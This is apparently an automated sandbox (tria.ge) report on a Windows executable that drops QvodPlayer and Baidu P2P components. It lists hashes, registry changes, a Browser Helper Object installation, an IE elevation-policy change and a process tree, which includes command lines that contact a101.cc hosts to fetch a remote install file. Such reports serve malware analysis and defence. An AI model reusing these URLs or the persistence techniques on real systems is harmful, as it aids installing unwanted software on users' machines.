Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
26/11/2022, 23:09
Static task
static1
Behavioral task
behavioral1
Sample
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe
Resource
win7-20220812-en
General
-
Target
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe
-
Size
1.8MB
-
MD5
8da4fe89fb206d881168a65d45d39efc
-
SHA1
1ccfb971125c5bac6f52638bfbb6daa3b42960af
-
SHA256
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c
-
SHA512
28557fcff7de0a3f8408b5cce56dabbbe3fd90fee70000a2f0680b730491de6596fd715e0fe2627941300798dd90e1d6d973d919a8b50678b624374e5f78c4c1
-
SSDEEP
24576:jmJQBePejfNGkCNwywvFYez/+YeyC1xfNPEqeB1+sbR8qkQ96A0eXa2jnNYIhM/O:jFffNzYi/mY+rfNPEB1zbHkQNtjQAFB
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
pid Process 1784 kuaibo.exe 1672 qvodupdate.exe 988 qvodkunbang.exe 288 BaiduP2PService.exe 1560 sr.exe -
resource yara_rule behavioral1/files/0x00080000000122f7-56.dat upx behavioral1/files/0x00080000000122f7-57.dat upx behavioral1/files/0x00080000000122f7-59.dat upx behavioral1/memory/1784-63-0x0000000000400000-0x00000000004B6000-memory.dmp upx behavioral1/memory/1784-66-0x0000000000400000-0x00000000004B6000-memory.dmp upx -
Loads dropped DLL 22 IoCs
pid Process 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1672 qvodupdate.exe 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 988 qvodkunbang.exe 988 qvodkunbang.exe 988 qvodkunbang.exe 288 BaiduP2PService.exe 288 BaiduP2PService.exe 288 BaiduP2PService.exe 988 qvodkunbang.exe 556 WerFault.exe 556 WerFault.exe 556 WerFault.exe -
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1" qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe -
Drops file in Program Files directory 18 IoCs
description ioc Process File created C:\Program Files (x86)\QvodPlayer\tools.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodupdate.exe File created C:\Program Files (x86)\tools\tools.exe qvodupdate.exe File opened for modification C:\Program Files (x86)\QvodPlayer\isWrite\ e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File created C:\Program Files (x86)\QvodPlayer\kuaibo.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File opened for modification C:\Program Files (x86)\QvodPlayer\ e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\qvodupdate.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\tools\ qvodupdate.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 556 1560 WerFault.exe 37 -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007c9d2851f5cbe84dab75cba46b71e8c6000000000200000000001066000000010000200000009af30ecfbe846a312fc8bdd1bb7f68f9be6d40c7e3d53e237ab31dff9ba4c9ab000000000e8000000002000020000000857f5afc4d9733e3442729a0ca788552e186e34732874a84fb5a9416a2d9b98720000000065b08013f0f1bb73870abfdc77e53f9d634d1a2d9dbaa6453cd7ec26effacbc40000000e3969bfed8b695a31fe8c7c0c9804e18aebf208c9b4b058ec65c66934ac51efd7e1a4f4209acec9c5753b00bc81f9a12cc78093dc14d0ed8fa242dde0c4d6943 IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376334705" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0b9c5ec8402d901 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007c9d2851f5cbe84dab75cba46b71e8c600000000020000000000106600000001000020000000368245f69dfd7989f6472f17ece6492a7dea23de4e4b3b6939bca7e064212f77000000000e8000000002000020000000822a4886968bc4e9ed621052e2967b6aa7f52967c67675e53d03d8edbf12de129000000004057071124b32b9f82d2a0f322da045d365166d2d532d71f46676e48dfa1c88d704430b325cee446f5a2e2da72293ae55a32db94e16ed35c5f065114ea6e6ffb4670c088e28b660c5fa4331d006913f4d751694326a4b7b48bf09c60a7afb90d175cc38526a403ce83e0a775204d3063b762f2cd8f61f9e127f90eaab188651d805f24abb9477dda4666686fa23c7dc400000001159e004e0a140d5adfafc2f2e451f62d2eabc591a47039d9c30d36ce7fc318af9edba5d7e8fa392bdab7e34d5df9a3f88a14a27dcbf65bcdba6f24b26915c03 IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser IEXPLORE.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{05EBC5F1-6E78-11ED-8DB1-7A3897842414} = "0" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage IEXPLORE.EXE -
Modifies registry class 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32 qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll" qvodupdate.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_Classes\Local Settings qvodupdate.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1672 qvodupdate.exe 1672 qvodupdate.exe 988 qvodkunbang.exe 988 qvodkunbang.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1672 qvodupdate.exe Token: SeDebugPrivilege 1672 qvodupdate.exe Token: SeDebugPrivilege 988 qvodkunbang.exe Token: SeDebugPrivilege 988 qvodkunbang.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1784 kuaibo.exe 1784 kuaibo.exe 1768 IEXPLORE.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1784 kuaibo.exe 1784 kuaibo.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1768 IEXPLORE.EXE 1768 IEXPLORE.EXE 964 IEXPLORE.EXE 964 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1972 wrote to memory of 1784 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 28 PID 1972 wrote to memory of 1784 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 28 PID 1972 wrote to memory of 1784 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 28 PID 1972 wrote to memory of 1784 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 28 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1972 wrote to memory of 1672 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 29 PID 1672 wrote to memory of 932 1672 qvodupdate.exe 31 PID 1672 wrote to memory of 932 1672 qvodupdate.exe 31 PID 1672 wrote to memory of 932 1672 qvodupdate.exe 31 PID 1672 wrote to memory of 932 1672 qvodupdate.exe 31 PID 932 wrote to memory of 1768 932 iexplore.exe 32 PID 932 wrote to memory of 1768 932 iexplore.exe 32 PID 932 wrote to memory of 1768 932 iexplore.exe 32 PID 932 wrote to memory of 1768 932 iexplore.exe 32 PID 1768 wrote to memory of 964 1768 IEXPLORE.EXE 34 PID 1768 wrote to memory of 964 1768 IEXPLORE.EXE 34 PID 1768 wrote to memory of 964 1768 IEXPLORE.EXE 34 PID 1768 wrote to memory of 964 1768 IEXPLORE.EXE 34 PID 1972 wrote to memory of 988 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 35 PID 1972 wrote to memory of 988 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 35 PID 1972 wrote to memory of 988 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 35 PID 1972 wrote to memory of 988 1972 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 35 PID 988 wrote to memory of 288 988 qvodkunbang.exe 36 PID 988 wrote to memory of 288 988 qvodkunbang.exe 36 PID 988 wrote to memory of 288 988 qvodkunbang.exe 36 PID 988 wrote to memory of 288 988 qvodkunbang.exe 36 PID 988 wrote to memory of 1560 988 qvodkunbang.exe 37 PID 988 wrote to memory of 1560 988 qvodkunbang.exe 37 PID 988 wrote to memory of 1560 988 qvodkunbang.exe 37 PID 988 wrote to memory of 1560 988 qvodkunbang.exe 37 PID 1560 wrote to memory of 556 1560 sr.exe 39 PID 1560 wrote to memory of 556 1560 sr.exe 39 PID 1560 wrote to memory of 556 1560 sr.exe 39 PID 1560 wrote to memory of 556 1560 sr.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe"C:\Users\Admin\AppData\Local\Temp\e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Program Files (x86)\QvodPlayer\kuaibo.exe"C:\Program Files (x86)\QvodPlayer\kuaibo.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1784
-
-
C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe" http://123.a101.cc/u.php?id=893⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://123.a101.cc/u.php?id=894⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1768 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:964
-
-
-
-
-
C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
PID:288
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 7324⤵
- Loads dropped DLL
- Program crash
PID:556
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
758KB
MD558048a500b343f8cf45b9ba298bbf2ba
SHA108cefa1fcef16ac545a220c2eb6e299f90917bfe
SHA256c4d1fea25898b46e1e5570c932ba1d4f3de0c8002534c5ac02f4fdee5ff55d4d
SHA5126493e84daaadcc866a97f631af6a0af023e82fedf898bae6e91f5919a1caeb3ca11ad219756e9d548c0f180ac2192a8032c944d25ec49d0285b4cefa5a4e4bd0
-
Filesize
758KB
MD558048a500b343f8cf45b9ba298bbf2ba
SHA108cefa1fcef16ac545a220c2eb6e299f90917bfe
SHA256c4d1fea25898b46e1e5570c932ba1d4f3de0c8002534c5ac02f4fdee5ff55d4d
SHA5126493e84daaadcc866a97f631af6a0af023e82fedf898bae6e91f5919a1caeb3ca11ad219756e9d548c0f180ac2192a8032c944d25ec49d0285b4cefa5a4e4bd0
-
Filesize
421KB
MD57bf0ed680b14fd3ca5684d3774d1e79d
SHA15d5bbabe3cce42137b86e61cc8d05edce1b327d8
SHA256a119be9d9ccbea4ec8fbbd61f52b62da58e21d817eaab40ba923530c96d1f980
SHA5120e7e966b6b19bdc99eede9172f50d2ac4bc6e7bb6cfbc1e2ad3da5908905179d565181faca43e6cc1d308520568b716877f17f4ed9bb33721e9290c3ecf10196
-
Filesize
421KB
MD57bf0ed680b14fd3ca5684d3774d1e79d
SHA15d5bbabe3cce42137b86e61cc8d05edce1b327d8
SHA256a119be9d9ccbea4ec8fbbd61f52b62da58e21d817eaab40ba923530c96d1f980
SHA5120e7e966b6b19bdc99eede9172f50d2ac4bc6e7bb6cfbc1e2ad3da5908905179d565181faca43e6cc1d308520568b716877f17f4ed9bb33721e9290c3ecf10196
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
154KB
MD583bcf3ad82ce65d2bd0fdd364fe32cb5
SHA132c5080bbf51dd22bed7f594a92f753a25eef73c
SHA2565635105c90c618c8db7a11cc031dbfb91aba92b0b8c960d6fb02f1fb4ff9758d
SHA512852c6176bd92c2fa4d8177764bcf8e6c9acb06cea488972376e6d6acb4e01c02f306f9b73ca36663f1c82b0443049e0898a0d6638a0760f957eade50a6ba8e81
-
Filesize
17KB
MD5d9f97bbefebd7f6680a5cd7e428e7c6e
SHA1b8f27fd1cecd21a0d893cd6c4d2900fcf5e657a9
SHA256bb445582d1ea6728c3ef6836d0523b3d36b36f3ebc1206cdfcde1ef92493f506
SHA5125808b085bdb028dae82434b255a0b1da3391409942899ecd4a7a01734e617f5e11a28d56e01d82aace80e5e37f395f43113cc8e96b532726388818f3c41d7f5d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize340B
MD5fec9690014e6b820e3327d80774e06ef
SHA1c03caeeacc372c55362304c3a204d801ff9ba221
SHA256b5bf82e98a68a4418e0d16f96eaed67f8b3b24f3a527d6346f20ca2abc90edca
SHA51275af41ffd9c2efac68adf27708c91689436253781fc3cc1cc9bb5cdd1644aa516142f790625cbf2047156d9dc5ff6259999b4e2297b851e146bf8248d0d779fd
-
Filesize
603B
MD5967458b0158610ef5b8c02a140bd1f4f
SHA1b7e5182fab097424720dcc852ea04113079b6d5a
SHA2566ff66901bf39d93f8b0ee03ed919aaa0d948b3e34799aecd7f9cd141ba1da7e1
SHA512f7559b75e951e9a87fd62ea39b932f7d28926d7125900f7ba3fbea97ebc367a10041080a8213102dd8bfc36f05baba1570c127c0d5198b608389dbefd21c2889
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
758KB
MD558048a500b343f8cf45b9ba298bbf2ba
SHA108cefa1fcef16ac545a220c2eb6e299f90917bfe
SHA256c4d1fea25898b46e1e5570c932ba1d4f3de0c8002534c5ac02f4fdee5ff55d4d
